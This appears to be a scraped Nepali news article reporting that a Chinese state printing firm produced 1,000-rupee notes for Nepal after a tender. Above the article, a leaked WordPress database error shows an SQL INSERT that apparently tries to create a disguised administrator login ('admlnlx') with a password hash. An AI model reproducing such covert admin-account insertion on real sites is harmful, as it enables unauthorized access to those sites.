WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYsSwSwFKqGgx8A0Ijgxe1oQImxtvV.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:06:15', '', 'admlnlx', 'admlnlx')
काठमाडौँ,माघ ५ –
नेपाली नोट छाप्ने जिम्मा पाएको चाइना बैंक नोट प्रिन्टिङ एण्ड मिन्टिङ कर्पाेरेसनले पहिलोपटक १ हजारका नोट छापेर नेपाल पठाएको छ ।यो नोटहरु चीनको पूर्वी तटस्थित नाचाङ-ज्याङ्सी प्रान्त हुँदै नेपाल भित्रिने चरणमा रहेका छन् । अगष्टमा खुलेको नोट छपाइ टेन्डरमा बि्रटिस तथा फ्रेन्च कम्पनीलाई पछि पार्दै चिनियाँ कम्पनीले टेन्डर हात पारेको थियो ।
२० करोड रुपैयाँ बराबरको १ हजारका नोट छाप्ने जिम्मा पाएको चाइना बैंक नोट पि्रन्टिङ एण्ड मिन्टिङ कर्पाेरेसनले यसअघि १ सयको नोट छापिसेकेको छ ।यो कम्पनीले २० करोड ६० लाख बराबरको ५ रुपैयाँको नोट छाप्ने पनि टेन्डर पाएको राष्ट्र सहप्रवक्ता राजेन्द्र पण्डितले जानकारी दिए ।नेपाली नोट छापेको चाइना बैंकनोट पि्रन्टिङ एण्ड मिन्टिङ कर्पाेरेसनले चिनियाँ मुद्रा पनि छाप्ने गरेको छ ।